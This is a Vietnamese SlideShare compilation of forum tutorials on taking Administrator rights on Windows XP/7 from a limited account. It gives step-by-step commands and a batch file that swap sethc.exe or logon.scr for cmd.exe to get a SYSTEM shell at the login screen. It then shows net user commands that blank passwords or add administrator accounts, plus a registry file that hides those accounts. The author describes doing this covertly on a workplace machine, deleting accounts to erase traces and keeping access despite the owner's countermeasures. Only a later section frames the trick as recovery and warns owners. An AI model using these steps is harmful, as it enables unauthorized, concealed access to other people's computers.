SlideShare a Scribd company logo
1 of 14
Đoạt quyền Administrator trong Windows XP
Bài viết này hướng dẫn lấy pw Quản trị của máy tính trong trường hợp các bạn cần sử
dụng máy tính ở quyền Admin trong khi chỉ được phép sử dụng máy ở dạng ... Guest hay
Limited. Không khuyến khích đi phá hoại máy tính người khác.
Hiện nay không có quá nhiều cách để phục hồi mật khẩu của tài khoản Administrator trong
Windows bị quên mất. Có thể kể đến là dùng công cụ hỗ trợ của đĩaHiren Boot để xóa
trắng mật khẩu của tài khoản Administrator hay dùng các công cụ dò tìm mật khẩu trên
Net. Tuy vậy, không phải lúc nào chúng ta cũng có công cụ để dùng. Nếu gặp những lúc
như thế.... hãy lợi dụng lỗ hỏng của file sethc.exe trên Windows.
Bước 1: Vào windows với tài khoản User bình thường và nhấn 5 lần phím Shift để gọi thử
chương trình StickyKey trên Windows và đóng nó lại (chỉ nhằm để xem thử).
Bước 2: Vào Start >> Run >> nhập vào Notepad và Enter để gọi chương trình
Notepad.exe. Copyđoạn mã của mình viết, past vào notepad, Save lại với tên là
Hackpass.bat
cd %systemroot%/system32
rename sethc.exe sethc.exe.bk
copy cmd.exe sethc.exe /y
Sau đó nhấp kép chuột lên file Hackpass.batđể thực thi!
Đoạn mã này làm các nhiệm vụ sau:
1. Sao lưu lại file sethc.exe bằng cáchđặt lại tên là sethc.exe.bk
2. Thay thế file sethc.exe bằng file cmd.exe
Đến đây, bạn log off user đang dùng (Guest hoặc Limited user) rồi từ cửa sổ chờ Login
vào Windows, nhấp phím Shift 5 lần, nếu chương trình Command Run được gọi thay vì
chương trình StickyKey thì bạn đã thành công! Bạn đang có toàn quyền với hệ thống với
cửa sổ Command Run này. Chú ý là bạn sẽ không thực hiện được các bước tiếp theo nếu
thao tác trên cửa sổ Command Run trong tài khoản Guest hay Limited mà không Log off
nó như Lãng khách vừa lưu ý.
Chương trình StickyKey đã được thay bằng Command Run
Thật ra, với cách này, các bạn có thể biến đổitùy ý các Users trên máy, kể cả các Admin
khác. Muốn đổipw một user có sẵn trong máy, ta xem có những users nào đang có trên
máy (kể cả users ẩn):
net user
Xóa trắng password của Administrator (hay tương tự với bất kì user nào):
net user Administrator
Thêm một tài khoản LangkhachVNP với mật khẩu là 123
net user LangkhachVNP 123 /add
Gán tài khoản LangkhachVNP vào nhóm quản trị (sau bước này tài khoản LangkhachVNP
mới có quyền Adminitrators):
net localgroup Administrators LangkhachVNP /add
Nếu bạn sử dụng đúng cấu trúc lệnh phíatrên, bạn sẽ tạo được các tài khoản mới. Tại đây,
bạn có thể đăng nhập vào các tài khoản mới mà không cần khởi động lại máy!
Sau khi dùng xong tài khoản LangkhachVNP, xóa nó đi để giấu dấu vết (các thư mục và
dữ liệu của User này vẫn còntrong máy, để sau này ... tạo lại user ... dùng tiếp (kể ra ai
tinh ý sẽ thấy nó).
net user LangkhachVNP /delete
Cuối cùng, nếu thư mục system32 được bảo vệ bằng soft tương tự Folder Lock, thì các bạn
phải Reset acc Admin bằng Hiren's Boot CD (Lãng khách đã gửi bài hướng dẫn dùng
Hiren's Boot USB, nghĩa là dùng USB thay vì CD). Khi reset xong Adminitrators pw, ta có
thể chạy file Hackpass.bat ở trên trong Safe Mode (đảm bảo việc sao lưu và đổitên không
có gì cản trở bằng bất kì phần mềm gì) để sau này, không cần đăng nhập gì, cứ Shift 5 lần
là sẽ có cửa sổ Command cho ta ... tùy ý thao tác...
Tất nhiên, sau khi xóa trắng pw Adminitrators, chủ máy sẽ biết, và họ sẽ có những thay
đổi. Họ sẽ cố gắng tìm mọi cách ngăn cản chúng ta xâm nhập máy họ, nhưng nếu cmd.exe
(đã đổitên) vẫn tồn tại trong System32, thì ta vẫn hoàn toàn làm chủ tình thế. Nhớ là, tạo
mới acc Admin xong, nhớ xóa đi để xóa dấu vết.
2 lệnh trên liệu có thực thi được ko (nếu file system là NTFS )trong khi đang login bằng
acc User thường. Chỉ có user trong group Administrators, Power Users, System, Create
Owner mới có quyền wite , User thường chỉ Read , execute trong system32 folder được
mà thôi
Còn nếu là FAT thì ok, ko vấn đề gì cả
Chú ý nhỏ, nếu bạn làm theo cách trên, thì bạn lúc chưa login vào Win , bấm Shift 5 lần,
lúc này bạn sê có permission là System, còn nếu đang login bằng user thường, sau đó bấm
shift 5 lần thì vần chỉ là acc user thương thôi
Lãng khách không đề cập vấn đề login acc thường hay Admin sau khi rename được
sethc.exe, vì chỉ cần Log off tài khoản Guest hay limited thì khi bấm Shift 5 lần là sẽ có đủ
quyền Admin như bạn longbottom vừa nói (Lãng khách khi nãy quên chưa đề cập). Nếu
file .bat không hoạt động, ta có thể thực hiện thủ công không vấn đề gì (copyvà paste kèm
theo rename). Đúng là Lãng khách chưa thử với NTFS, còn, bước xóa trắng pw Admin chỉ
là tiền đề cho ta vào Safe mode, chèn file cmd.exe thay cho file sethc.exe, sau này, cứ ở
cửa sổ chờ login là ta có thể type vài dòng lệnh là được, chứ nếu ta cứ cố tình sử dụng
Hiren's bootUSB không phải là giải pháp hay, và rất mất thì giờ không cần thiết (USB làm
việc chậm hơn CD một chút).
Lãng khách phải làm thế ở máy cơ quan, khi nào cần vào máy thì Shift 5 lần và type vài
dòng lệnh, tạo user mới, dùng xong xóa user đó. Chúng ta không cần thiết tới Hiren's một
khi chưa tối cần thiết chứ .
Cái mà Lãng khách cần là nếu không để ý kĩ, người ta sẽ không biết là máy mình đã bị sử
dụng (vì pw Admin của tất cả các users không hề bị thay đổi, thậm chí cả danh sách các
users). Nếu phát hiện pw Admin bị thay đổi thì ... nói làm gì .
Với NTFS thì po tay rùi " Access Is Deni" hix hix
Đúng thế. Lãng khách đã xem lại. Nếu có quyền Owner hoặc User được Owner cho phép
thì ta có thể thay đổi permission cho system32 folder (chờ người ta sơ hở, hoặc mượn sử
dụng máy trong quyền Admin, rồi ta tiến hành thay đổi, thì được. FAT32 không có
Security Tab này). Đây chính là lí do vì sao chúng ta vẫn được khuyên dùng NTFS, do tính
bảo mật cao hơn rất nhiều. Sau khi thử tìm hiểu, Lãng khách biết rằng, ta có thể bảo mật
cho bất kì file hay thư mục nào với quyền Owner, mà nếu không có pw Owner thì không
có user nào có thể nhìn thấy (nếu cho thuộc tính ẩn với từng user), hay không có quyền
đọc, xóa, ...
Như vậy, với NTFS system, thì ta sử dụng Hiren's Boot USB (hoặc CD), xóa trắng pw
Adminitrator, sau đó, thay đổi permission cho phép truy cập system32 folder, sau đó tạo
thay đổicho sethc.exe như Lãng khách đã hướng dẫn, rồi tiếp tục khôi phục bảo vệ gốc
cho system32 folder để ... không cho phép thay đổisystem32 folder. Từ sau đó, dù chủ
máy có thay đổiuser thế nào, pw thế nào, chỉ cần sethc.exe (thực chất là cmd.exe) vẫn tồn
tại, thì cứ ở cửa sổ chờ Login, ta shift 5 lần, rồi tự tiện thêm user khác, cấp quyền
Adminitrator, sử dụng, dùng xong del user vừa tạo, nhất cử lưỡng tiện .
Lãng khách sẽ hướng dẫn các bạn cách reset Pw Adminitrators (NTFS) bằng USB sau, rất
nhanh, dễ hiểu (không cần sử dụng Hiren's Boot).
Nếu mà chỉ xóa User thôi thì chưa đủ, bởi vì mỗi khi tạo user và login bằng user đó, OS sẽ
tạo 1 profile tương ứng với user đó, cho nên cần phải xóa luôn profile của user đó luôn ,nó
nằm trong %systemdriver%document and settings
Đương nhiên Lãng khách biết rõ điều này, nhưng đối với NTFS, thì ta hoàn toàn có thể ẩn
đi các thư mục đó mà không có dấu vết gì cả.
Sau khi dùng xong tài khoản LangkhachVNP, xóa nó đi để giấu dấu vết (các thư mục và
dữ liệu của User này vẫn còntrong máy, để sau này ... tạo lại user ... dùng tiếp (kể ra ai
tinh ý sẽ thấy nó).
Ta nên để ẩn, chứ xóa đi khi có quyền hạn System từ cửa sổ cmd.exe cũng không phải là
quá khó .
Cũng không có gì khó lắm. Em copyđoạn codesau vào NotePad, rồi thay cụm
"Administrator" bằng tên chính xác của User em muốn ẩn đi (ví dụ "LangkhachVNP"), rồi
save as thành file HideUsers.reg và nhấp đúp HideUsers.reg, trả lời Yes để chạy nó:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserList]
"Adminstrator"=dword:00000000
Lưu ý, khi em muốn login tài khoản đã ẩn đi, trong cửa sổ chờ Log on, Ctrl+Alt+Del 2 lần,
rồi gõ chính xác username và mật khẩu rồi Enter.
Tuy nhiên, chưa chắc các user em nhìn thấy ở cửa sổ Log on đã đúng như em thấy. Chẳng
hạn, Lãng khách có thể đổi tên Acc Administrator thành Admin, và có thể lập User
Langkhach, sau đó rename tên của Langkhach thành Lãng khách cho dễ nhìn. Sau khi
Rename cho dễ nhìn, thì tên user thật sự máy nhận biết vẫn là Langkhach chứ không phải
Lãng khách. Để biết chắc chắn máy có những user gì, kể cả user ẩn, em có thể xem lại ở
bài viết đầu tiên, ta xem có những users nào đang có trên máy (kể cả users ẩn):
Trước tiên, Start--->Run. Gõ cmd rồi enter. Tiếp tục gõ Net user rồi enter, danh sách các
users sẽ hiện ra. Ghi nhớ các tên user này để cho từng user ẩn đi hay hiện lên tùy thích
bằng cách edit file Reg khi nãy của Lãng khách.
Tương tự, muốn hiện lại user ẩn đó, em lại dùng đoạn codesau (chú ý, điền chính xác tên
user cần hiện lên thay "Administrator"):
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserList]
"Adminstrator"=dword:00000001
Đoạn codenày sẽ thay giá trị dword từ "0" sang "1", em chú ý.
Thủ thuật với registry :
Start + Run : type : regedit
Tìm theo đường dẫn
HKEY_LOCAL_MACHINESo
ftwareMicrosoftWindows
NTCurrentVersionWinlogo
nSpecialAccountsUserList
create a new DWORD
value với tên user cần ẩn.
Muốn ẩn user nào thì bạn
phải gõ chính xác tên user
đó.
0 - Hides the user just from
the welcome screen
1 - The user is shown
Sau khi thêm user cần ẩn :
Lãng khách nhớ rằng đã có
lần nói qua về vấn đề này.
Trước đây, trên Internet tràn
lan các bài viết hướng dẫn lấy
quyền Administrator của
Windows mà chỉ cần can
thiệp trực tiếp ngay trên
Windows quyền Limited.
Nhưng chỉ áp dụng thành
công trên FAT32. Từ khi
NTFS trở nên phổ biến, đồng
thời Windows đã biết và fix
lại lỗ hổng này, thì thủ thuật
nói trên đã đi vào quên lãng.
Thực ra thì không phải là
Microsoft đã fixed và NTFS trở nên phổ biến thì chúng ta không còngiải pháp nào. Lãng
khách đã phải giúp đỡ rất nhiều người lấy lại quyền Admin trong những trường hợp như
vậy bởi rất nhiều lí do không tiện nhắc tới (không CD, không hỗ trợ USB boot).
Đối với mỗi trường hợp nâng cấp thì có một cách giải quyết khác nhau. Điều kiện cần là
các bạn phải có pw một tài khoản Limited. Các bạn chú ý rằng, có những trường hợp, áp
dụng một vài bước theo tất cả các bước hướng dẫn là thừa, nhưng Lãng khách chỉ muốn
hướng dẫn một cách chung nhất. Có nhiều cách đơn giản hơn nhiều đốivới từng trường
hợp cụ thể.
1. Đăng nhập quyền Limited mà bạn đang có một cách bình thường. Mục đíchlà để
Windows lưu trữ tên người dùng cuối cùng đăng nhập (chính là tên user Limited bạn đăng
nhập). Mặc định tính năng này được bật, rất ít khi nó bị disabled (phải sử dụng Regedit).
Lãng khách yêu cầu bước này là vì, trong Windows, tên user tại Welcome screen hoàn toàn
có thể thay đổi, nhưng thực tế thì tên user được tạo ban đầu vẫn được quản lí mà các bạn
có thể không hề hay biết.
2. Restart máy tính ở chế độ Safe-mode. Khi này, tên user limited của bạn sẽ không được
hiển thị (trong Safe-mode, Windows chỉ chấp nhận tài khoản Admin). Chú ý bạn không
được nhấp chuột vào bất kì tên user nào hiện ra trong danh sách. Nếu lỡ nhấp phải một tên
user nào rồi, làm lại bước 1.
3. Bấm tổ hợp phím CTRL+ALT+DEL 2 lần. Cửa sổ đăng nhập hiện ra. Nếu các bạn làm
đúng hướng dẫn, tên user limited thực sự sẽ hiện ra sẵn ở ô username. Ô pw, các bạn nhập
pw vào rồi ENTER.
4. Bấm tổ hợp phím Ctrl+F 2 lần mở 2 cửa sổ tìm kiếm. Ở một cửa sổ tìm kiếm, các bạn gõ
tìm file cmd.exe, cửa sổ cònlại tìm file sethc.exe.
5. Chờ cho quá trình tìm kiếm kết thúc, tại cửa sổ tìm thấy file cmd.exe, các bạn phải chuột
một file cmd.exe chọn copy(tốt nhất là file cmd.exe trong system32 folder) rồi bấm tổ hợp
phím Windows+D ra Desktop, bấm Ctrl+V dán ra đó.
6. Nhấp đúp chạy file cmd.exe tại desktop, gõ dòng lệnh sau rồi ENTER:
copycmd.exe sethc.exe
7. Lần lượt nhấp phải chuột từng file sethc.exe tìm được ở cửa sổ tìm kiếm cònlại, phải
chuột chọn Open Containing Folder. Có bao nhiêu file sethc.exe tìm được, bạn nên mở
được ngần ấy thư mục chứa. Càng nhiều file sethc.exe tìm được, Windows của bạn được
bảo mật càng tốt. Nếu chỉ có một file sethc.exe tìm được, bạn cần phải xem lại cách sử
dụng Windows của mình .
8. Giữ Ctrl, nhấp trái chuột vào file sethc.exe tại Desktop (thực chất là bản copycủa
cmd.exe) kéo thả vào từng thư mục chứa file sethc.exe vừa mở từ cửa sổ tìm kiếm, trả lời
Yes để xác nhận quá trình ghi đè thay thế.
9. Các bước lấy quyền Admin còn lại đã cực kì đơn giản rồi, các bạn có thể tham khảo bài
viết dưới đây của Lãng khách:
Cách xem định dạng ổ cứng HDD là FAT, FAT 32 hay NTFS
Hiện nay máy tính Windows chủ yếu sử dụng định dạng NTFS là mặc định. Bởi NTFS hỗ
trợ một tính năng quan trọng, đó là cho phép bạn lưu trữ file có dung lượng lớn hơn 4GB.
Vậy nếu muốn chuyển qua định dạng NTFS cho ổ đĩa của mình thì trước tiên bạn phải xác
định chuẩn định dạng của ổ cứng HDD là FAT, FAT32, hay NTFS trước đã.
CÁCH XÁC ĐỊNH CHUẨN ĐỊNH DẠNG CỦA Ổ CỨNG HDD LÀ FAT, FAT 32 HAY
NTFS
Bước 1: Đầu tiên từ màn hình desktop bạn mở My Computer.
Bước 2: Tiếp đến bạn nhấn chuột phải vào ổ
C/D chọn Properties.
Lúc này ở tab General bạn quan sát phần File
system. Tại đây sẽ ghi chuẩn định dạng của ổ
đĩa mà bạn đang sử dụng. Ví dụ của tôi
là NTFS.
http://thuthuat.taim ienphi.v n/x ac -dinh-hdd-la-fat-fat-32-hay -ntfs -4407n.as px
Đó là cách đơn giản giúp bạn xác định chuẩn
định dạng của ổ cứng là HDD là FAT, FAT 32,
hay NTFS. Hiện nay hầu hết người dùng đã
chuyển sang NTFS vì tính
khả dụng của nó. Nếu chưa
chuyển thì bạn tham
khảo đổi FAT32 sang
NTFS không dùng phần
mềm mà chúng tôi đã cung
cấp.
Bạn chỉ được truy cập vào máy tính với một quyền
user thông thường và điều đó khiến bạn bực bội
mỗi khi cần cài đặt hay sử dụng một chương trình
nào đó. Bài hướng dẫn này sẽ giúp bạn giải tỏa bực
bội bằng cách “hack chơi” mật khẩu của Admin
mà không cần sử dụng tới một phần mềm thứ ba
nào cả.
Lưu ý: Cách này không áp dụng được cho ổ đĩa
NTFS
- Vào Start > Run gõ lệnh cmd và nhấn Enter. Cửa sổ lệnh sẽ được mở ra và nhập chính xác
các câu lệnh sau:
cd trở về thư mục gốc
cdwindowssystem32 vào thư mục system32
mkdir hackdir tạo thư mục hackdir
copy logon.scrhackdirlogon.scr sao lưu file logon.scrvào thư mục hackdir
copy cmd.exe hackdircmd.exe sao lưu file cmd.exe vào thư mục hackdir
del logon.scrxóa file logon.scrgốc
copy hackdircmd.exe logon.scrsao lưu file cmd.exe trong thư mục hackdir trở về
system32 và đổi tên thành logon.scr
exit đóng cửa sổ lệnh
- Sau đó khởi động lại máy tính.
Với các câu lệnh trên bạn đã thay đổi file chạy giao diện Windows Welcome thông thường
bằng lệnh khởi chạy chương trình cửa sổ lệnh Command Prompt với quyền system chứ không
phải quyền user nào cả. Do đó tại cửa sổ lệnh này bạn có thể tiến hành thay đổi mật khẩu của
tài khoản Admin trên máy.
Sau khi khởi động lại máy tính, thay vì màn hình Welcome bạn sẽ thấy một cửa sổ lệnh hiện
ra.
Tại đây bạn có thể tiến hành theo 1 trong 2 cách sau:
Cách 1: Đổi mật khẩu tài khoản Admin sẵn có
Tại cửa sổ lệnh có thể sử dụng một trong các lệnh sau:
net user <username> <new pass> thay mật khẩu tài khoản quản trị bằng mật khẩu mới
hoặc
net user <username> xóa trắng mật khẩu của tài khoản này
Ví dụ: net user Administrator 123 câu lệnh này đổi mật khẩu tài khoản Administrator thành
123.
Cách 2: Thêm một tài khoản mới với quyền Admin
Tại cửa sổ lệnh lần lượt gõ các lệnh sau:
net user <username> <password> /add thêm một tài khoản với tên và mật khẩu tương ứng
net localgroup Administrators <username> /add đưa tài khoản vừa tạo vào nhóm quản trị
Vậy là thông qua 2 cách này, bạn có thể đăng nhập vào tài khoản vừa tạo hoặc sử dụng mật
khẩu vừa đổi của tài khoản Administrator để đăng nhập vào máy tính với quyền quản trị mức
cao nhất.
Quan trọng: Đừng quên copy các file trong thư mục hackdir trở về thư mục system32 để hệ
thống của bạn hoạt động trở lại như bình thường.
Lợi dụng StickyKey chiếm
quyền truy cập hệ thống
Anh Vinh, có cách nào lấy lại cái quyền
Admin không vậy ? Hồi bữa cái máy của cậu
Anh cứ vào Windows là phải click chọn
account (dù chỉ có 1 account). Tý tức quá, vào
Account User vọc. Vọc một hồi thấy trong cái
Group có 1 tài khoản Administrator, 1 cái user
đang dùng (có name là John nằm trong Group
Admin -> có quyền admin) và một số user
Guest.
Tý thấy nhiều quá nên….disable hết ! Lỡ tay
disable luôn cái user Administrator (vì có cái user John nằm trong Group Admin nên có thể
disable user Administrator). Sau đó chỉ còn lại cái user John nằm trong Group Admin mà khi
nhấn vào user này, nhìn bên tay phải có một biểu tượng Administrator, Tý thấy vậy nên nhấn
“Remove” khỏi group Administrator ==> user John mất luôn quyền admin. Giờ không thể làm
được gì hết, không thể vào Local Group để enable lại vì không có quyền Admin, không thể
Defragment ổ cứng luôn.
Đại ý là máy tính hiện tại đã bị vô hiệu hóa tài khoản quản trị cao nhất (Administrator). Đồng
thời, tài khoản hiện tại (user John) đã bị “giáng chức” từ Admin xuống thành user bình thường
(do đã bị remove ra khỏi nhóm Admin) —> user John đã biến thành user Guest, không có bất
kỳ quyền hạn nào với hệ thống, làm cái gì cũng bị cấm !
Chỉ có những tài khoản ở nhóm quản trị (Administrators) hoặc tài khoản Administrator mới có
quyền cho một user nào đó vào nhóm Admin mà thôi. Trong trường hợp của nó, tất cả các tài
khoản thuộc nhóm Administrators đã bị vô hiệu hóa ! Vì vậy, về mặt lý thuyết thì pógiò,
không có cách nào có thể giúp phục hồi bởi vì trong tay người dùng không hề có một tài
khoản có quyền Admin để thực hiện bất cứ việc gì, kể cả thực hiện ngoài DOS.
Tuy nhiên có một cách có thể giúp bạn enable lại tài khoản Adminstrator và làm rất nhiều
chuyện khác như xóa, di chuyển các user vào các Group khác nhau. Trong trường hợp này, tôi
sẽ phục hồi lại quyền hạn Admin cho user John như lúc ban đầu mặc dù trong tay không hề có
tài khoản quản trị nào. Không biết cái tiêu đề bài viết có đúng không nữa, mà tôi cũng chẳng
nghĩ ra được cái khác.
Có một phương pháp mà giang hồ đồn đại là “lỗ hổng bảo mật” của Windows, vẫn áp dụng
được cho đến phiên bản mới nhất là Windows 7, tôi vừa mới thực hiện thành công. Đó là lợi
dụng tính năng Sticky Key của Windows. Đây là ứng dụng nhỏ dùng để hỗ trợ người khuyết
tật. Khi vào màn hình đăng nhập Windows, bạn chỉ cần nhấn phím Shift 5 lần, bạn sẽ thấy cửa
sổ Sticky Key hiện ra.
Theo mô tả kỹ thuật thì Windows sẽ sử dụng quyền hệ thống để gọi tập tin “sethc.exe” trong
thư mục System32. Và thủ thuật mà giang hồ đồn đại là chúng ta sẽ đánh lừa Windows bằng
cách thay thế tập tin “sethc.exe” bằng tập tin “cmd.exe”, dĩ nhiên là phải đổi lại tên. Tức là khi
bạn nhấn phím Shift 5 lần, Windows sẽ gọi cửa sổ Command Prompt (thay vì gọi ứng dụng
Sticky Keys) với quyền hạn của hệ thống –> như vậy bạn có thể thực thi các câu lệnh trong
cửa sổ command Prompt mà không gặp vấn đề gì về quyền bởi vì quyền System là quyền cao
nhất.
Vấn đề là trong trường hợp hiện tại của đứa em, nó không thể thay thế được tập tin
“sethc.exe” bằng tập tin “cmd.exe” do tài khoản hiện tại hoàn toàn không có quyền gì cả –>
Tập tin “sethc.exe” là tập tin hệ thống và nếu user không đủ quyền thì không thể copy, đổi tên
hay xóa nó được. Giả sử user đó có quyền admin thì cũng phải thực hiện thao tác chiếm quyền
truy cập thì mới mong đổi tên được.
Tôi nghĩ là trong DOS hoặc trong WinXP mini cũng không thể tác động gì được tập tin này.
Vì vậy, trong trường hợp này buộc phải sử dụng môi trường Linux để thực hiện. Để làm được
điều này, cách dễ nhất là tải về Hiren’sBootCD 10.6 và sử dụng Mini Linux được tích hợp
sẵn.
Tóm lại, điều kiện để thực hiện :
– Windows có thể hiển thị được màn hình đăng nhập.
– Đĩa CD cứu hộ Hiren’sBootCD v10.6
Bạn có thể tìm và tải đĩa CD
này trên mạng, dung lượng
khoảng 270Mb. Sau khi tải về
hãy giải nén và ghi nó ra thành
một đĩa CD, ghi ở chế độ “Ghi
ảnh” và chỉ tới tập tin ISO vừa
giải nén xong. Bất cứ phần
mềm ghi đĩa nào cũng có tính
năng ghi đĩa từ file ISO. Có thể
sử dụng CDBurnerXP.
Sau khi ghi đĩa xong, khởi động
máy tính từ đĩa CD này. Nếu
màn hình sau không hiện ra, bạn cần phải vào CMOS để
chỉnh lại thứ tự khởi động là ưu tiên khởi động từ đĩa
CD trước, sau đó mới đến ổ cứng.
Từ màn hình trên, bạn chọn Mini Linux. Đợi một chút
cho đến khi vào được Linux, đóng tất cả các cửa sổ nhấp
chuột phải vào màn hình desktop và
chọn Mount/Unmount như hình sau :
Cửa sổ hiện ra, bạn chọn ổ đĩa chứa hệ điều hành
Windows và bấm OK như hình sau :
Cửa sổ hiện ra thông báo thành công, bấm OK
Cửa sổ FileManager hiện ra, bạn chọn PCManFM và nhấn OK như hình sau :
Cửa sổ truy cập file hiện ra, ở cột bên tay trái, truy cập theo đường dẫn : mnt > sda2 (ổ đĩa đã
mount hồi nãy) và bạn sẽ thấy toàn bộ nội dung của ổ đĩa cài hệ điều hành Windows đang
dùng.
Từ đây, bạn truy cập vào thư mục “WindowsSystem32”. Tìm đến tập tin “sethc.exe” (gõ tên
trên bàn phím, nó sẽ tự động nhảy đến tập tin đó). Khi đã tìm ra, nhấp chuột phải vào đó và
chọn Rename như hình sau :
Một cửa sổ nhỏ hiện ra, bạn đổi tên lại thành “sethc.exe.bk” và bấm OK như hình sau :
Tiếp theo tìm tập tin “cmd.exe” (cũng trong thư mục System32 luôn), nhấp chuột phải vào đó
và chọn Copy
Sau đó nhấp chuột phải vào vùng trống và chọn Paste, cửa sổ sau sẽ hiện ra :
Bạn đổi tên nó thành “sethc.exe” như trong hình và bấm Rename. Vậy là xong, giờ hãy đóng
cửa sổ lại, nhấp chuột phải vào màn hình Desktop và chọn “Logout” > chọnReboot System để
khởi động lại hệ thống. Nhớ lấy đĩa CD ra khỏi ổ để nó khỏi khởi động từ đĩa CD.
Sau khi khởi động lại hệ thống và đến màn hình đăng nhập Windows, bạn nhấn phím Shift 5
lần và sẽ thấy cửa sổ Command Prompt hiện ra như sau :
Trước đó tôi đã gỡ bỏ user anhhangxom ra khỏi nhóm Administrators và hiện tại nó chỉ là một
user Guest bình thường. Giờ tôi sẽ sử dụng dòng lệnh để cho phép user anhhangxom vào
nhóm quản trị. Từ cửa sổ Command Prompt, gõ dòng lệnh “net localgroup Administrators
anhhangxom /add” như hình sau :
Windows thông báo việc add
thành công, đóng cửa sổ này lại
và truy cập vào tài khoản
anhhangxom, nó đã được
“thăng chức” làm Admin.
Đồng thời, bạn có thể active tài
khoản Administrator bằng cách
gõ dòng lệnh “net user
Administrator /active:yes” ->
cái này thì tôi đã có lần giới
thiệu rồi.
Cuối cùng cũng xong, kiếm cái gì nuốt cho no rồi làm tiếp thôi. Chỉnh sửa lại bài viết rồi gửi
cho nó cái đường link để làm theo, hy vọng được. Cũng từ đây cho thấy, việc lợi dụng
StickyKeys này có thể sẽ giúp người nhưng cũng có thể hại người. Nếu ai đó lợi dụng cách
này để remove tài khoản của bạn ra khỏi nhóm quản trị, đồng thời vô hiệu hóa luôn tài khoản
Admin thì tiêu ! Hoặc họ có thể sử dụng cách này để đăng nhập vào máy tính của bạn thông
qua user cao nhất là Administrator. Hơn 90% các máy tính cài Win7 bỏ trống mật khẩu của
User này và bình thường, user Administrator luôn bị Disable. Do đó, khi cần thiết thì hãy gỡ
bỏ tính năng nhấn Shift 5 lần này.

More Related Content

What's hot

Ứng Dụng Cơ Chế Hook Để Xây Dựng Chương Trình Hỗ Trợ Gõ Tiếng Việt Trên Hệ Đi...
Ứng Dụng Cơ Chế Hook Để Xây Dựng Chương Trình Hỗ Trợ Gõ Tiếng Việt Trên Hệ Đi...Ứng Dụng Cơ Chế Hook Để Xây Dựng Chương Trình Hỗ Trợ Gõ Tiếng Việt Trên Hệ Đi...
Ứng Dụng Cơ Chế Hook Để Xây Dựng Chương Trình Hỗ Trợ Gõ Tiếng Việt Trên Hệ Đi...nataliej4
 
Tăng tốc win XP
Tăng tốc win XPTăng tốc win XP
Tăng tốc win XPNguyễn Anh
 
Truy cập nhanh ứng dụng trong windows bằng lệnh trong hộp thoại run
Truy cập nhanh ứng dụng trong windows bằng lệnh trong hộp thoại runTruy cập nhanh ứng dụng trong windows bằng lệnh trong hộp thoại run
Truy cập nhanh ứng dụng trong windows bằng lệnh trong hộp thoại runNguyễn Anh
 
Huong dan su_dung_ghost
Huong dan su_dung_ghostHuong dan su_dung_ghost
Huong dan su_dung_ghostDai Van Tuan
 
Backup+restore+linux
Backup+restore+linuxBackup+restore+linux
Backup+restore+linuxphanleson
 
Thuyet_trinh_de_tai_Joomla
Thuyet_trinh_de_tai_JoomlaThuyet_trinh_de_tai_Joomla
Thuyet_trinh_de_tai_JoomlaTrung Mai
 
Part 10 ntfs permission - take ownership -www.key4_vip.info
Part 10   ntfs permission - take ownership -www.key4_vip.infoPart 10   ntfs permission - take ownership -www.key4_vip.info
Part 10 ntfs permission - take ownership -www.key4_vip.infolaonap166
 
Cách đăng nhập vào bất cứ máy tính nào dùng windows 7 qua tài khoản administr...
Cách đăng nhập vào bất cứ máy tính nào dùng windows 7 qua tài khoản administr...Cách đăng nhập vào bất cứ máy tính nào dùng windows 7 qua tài khoản administr...
Cách đăng nhập vào bất cứ máy tính nào dùng windows 7 qua tài khoản administr...laonap166
 
Bài giảng thực hành windows server 2008 776030
Bài giảng thực hành windows server 2008 776030Bài giảng thực hành windows server 2008 776030
Bài giảng thực hành windows server 2008 776030trucmt2000
 
backup windows server 2008
backup windows server 2008backup windows server 2008
backup windows server 2008chuongthai77
 
Máy tính tự khởi động lại
Máy tính tự khởi động lạiMáy tính tự khởi động lại
Máy tính tự khởi động lạidichvuseo247
 
76 meo trong windows
76 meo trong windows76 meo trong windows
76 meo trong windowsHoàng Trần
 
BÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNH
BÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNHBÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNH
BÀI 12: GIAO TIẾP VỚI HỆ ĐIỀU HÀNHTrần Nhân
 
Bài giảng Hệ điều hành
Bài giảng Hệ điều hànhBài giảng Hệ điều hành
Bài giảng Hệ điều hànhvungoclap
 
Bài giảng kỹ thuật lập trình hook
Bài giảng kỹ thuật lập trình hookBài giảng kỹ thuật lập trình hook
Bài giảng kỹ thuật lập trình hookjackjohn45
 

What's hot (20)

Ứng Dụng Cơ Chế Hook Để Xây Dựng Chương Trình Hỗ Trợ Gõ Tiếng Việt Trên Hệ Đi...
Ứng Dụng Cơ Chế Hook Để Xây Dựng Chương Trình Hỗ Trợ Gõ Tiếng Việt Trên Hệ Đi...Ứng Dụng Cơ Chế Hook Để Xây Dựng Chương Trình Hỗ Trợ Gõ Tiếng Việt Trên Hệ Đi...
Ứng Dụng Cơ Chế Hook Để Xây Dựng Chương Trình Hỗ Trợ Gõ Tiếng Việt Trên Hệ Đi...
 
Tăng tốc win XP
Tăng tốc win XPTăng tốc win XP
Tăng tốc win XP
 
Truy cập nhanh ứng dụng trong windows bằng lệnh trong hộp thoại run
Truy cập nhanh ứng dụng trong windows bằng lệnh trong hộp thoại runTruy cập nhanh ứng dụng trong windows bằng lệnh trong hộp thoại run
Truy cập nhanh ứng dụng trong windows bằng lệnh trong hộp thoại run
 
Bai 12 giaotiepvoi hđh
Bai 12 giaotiepvoi hđhBai 12 giaotiepvoi hđh
Bai 12 giaotiepvoi hđh
 
Bai tap thuchanh
Bai tap thuchanhBai tap thuchanh
Bai tap thuchanh
 
Huong dan su_dung_ghost
Huong dan su_dung_ghostHuong dan su_dung_ghost
Huong dan su_dung_ghost
 
Backup+restore+linux
Backup+restore+linuxBackup+restore+linux
Backup+restore+linux
 
Thuyet_trinh_de_tai_Joomla
Thuyet_trinh_de_tai_JoomlaThuyet_trinh_de_tai_Joomla
Thuyet_trinh_de_tai_Joomla
 
Part 10 ntfs permission - take ownership -www.key4_vip.info
Part 10   ntfs permission - take ownership -www.key4_vip.infoPart 10   ntfs permission - take ownership -www.key4_vip.info
Part 10 ntfs permission - take ownership -www.key4_vip.info
 
